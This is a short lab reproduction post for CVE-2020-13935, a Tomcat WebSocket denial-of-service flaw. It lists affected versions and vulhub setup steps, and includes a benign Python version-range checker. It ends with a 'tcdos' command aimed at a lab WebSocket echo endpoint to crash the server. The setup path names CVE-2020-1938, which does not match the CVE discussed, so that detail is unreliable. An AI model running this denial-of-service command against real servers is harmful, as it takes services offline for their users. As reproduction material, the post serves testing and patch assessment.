Apache Tomcat WebSocket Denial of Service Vulnerability CVE-2020-13935

Vulnerability Description

On November 6, 2020, 360CERT's monitoring picked up an analysis report released by @RedTeamPentesting on a Tomcat WebSocket denial-of-service vulnerability. The vulnerability is tracked as CVE-2020-13935, with severity rated High Risk and a score of 7.5.

An unauthenticated remote attacker can send a large number of specially crafted request packets to the Tomcat server, causing it to stop responding and fail to provide normal service.

Vulnerability Impact

Apache Tomcat 10.0.0-M1 to 10.0.0-M6
Apache Tomcat 9.0.0.M1 to 9.0.36
Apache Tomcat 8.5.0 to 8.5.56
Apache Tomcat 7.0.27 to 7.0.104

Environment setup

git clone https://github.com/vulhub/vulhub.git
cd vulhub/tomcat/CVE-2020-1938
docker-compose up -d


Vulnerability reproduction

Access the target and check whether its version falls within the affected version ranges.

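As an added example (not part of the original post, and not code from 360CERT or RedTeamPentesting), the following Python script performs this version check programmatically: it pulls the version out of text such as Tomcat's default error-page title or a Server header and compares it against the affected ranges listed above. Milestone builds (9.0.0.M1, 10.0.0-M6) are sorted before the corresponding final release so that the range endpoints compare correctly. The sample banners and the helper names are constructed for illustration.

```python
# Added example (not part of the original post): decide whether a Tomcat
# version string falls inside the affected ranges for CVE-2020-13935.
# Milestone builds ("9.0.0.M1", "10.0.0-M6") sort before the matching
# final release, so the range endpoints compare as intended.
import re
from typing import Optional, Tuple

# Affected ranges exactly as listed in the post, inclusive at both ends.
AFFECTED_RANGES = [
    ("10.0.0-M1", "10.0.0-M6"),
    ("9.0.0.M1", "9.0.36"),
    ("8.5.0", "8.5.56"),
    ("7.0.27", "7.0.104"),
]

# major.minor.patch with an optional milestone suffix written ".M<n>" or "-M<n>"
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?$")


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn a Tomcat version string into a sortable tuple.

    The fourth element is 0 for a milestone and 1 for a final release, so
    10.0.0-M6 < 10.0.0; the fifth element is the milestone number.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {text!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    if m.group(4) is not None:
        return (major, minor, patch, 0, int(m.group(4)))
    return (major, minor, patch, 1, 0)


def is_affected(version: str) -> bool:
    """True if `version` lies inside any of the affected ranges."""
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi)
               for lo, hi in AFFECTED_RANGES)


def version_from_banner(text: str) -> Optional[str]:
    """Extract the version from text such as a Server header value or the
    title of Tomcat's default error page ("Apache Tomcat/9.0.30")."""
    m = re.search(r"Apache Tomcat/(\d+\.\d+\.\d+(?:[.-]M\d+)?)", text)
    return m.group(1) if m else None


def assess(text: str) -> Tuple[Optional[str], Optional[bool]]:
    """Return (version, affected) for a banner, or (None, None) if no
    Tomcat version string is present."""
    version = version_from_banner(text)
    if version is None:
        return None, None
    return version, is_affected(version)


# Constructed sample banners (not captured from a real host).
SAMPLE_BANNERS = [
    "<title>Apache Tomcat/9.0.30 - Error report</title>",
    "Server: Apache Tomcat/9.0.37",
    "<h3>Apache Tomcat/10.0.0-M6</h3>",
    "Server: nginx/1.18.0",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        version, affected = assess(banner)
        if version is None:
            status = "no Tomcat version found"
        else:
            status = "AFFECTED" if affected else "not in affected range"
        print(f"{banner!r:55} -> {version} {status}")
```

The milestone handling is the part worth noting: a plain numeric comparison that ignores the "M" suffix would put the final 10.0.0 release inside the 10.0.0-M1 to 10.0.0-M6 range, while the listed ranges end at the M6 milestone.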

Check the memory usage of the target before the attack.



tcdos ws://192.168.51.133:8080/examples/websocket/echoStreamAnnotation


This post is licensed under CC BY 4.0 by the author.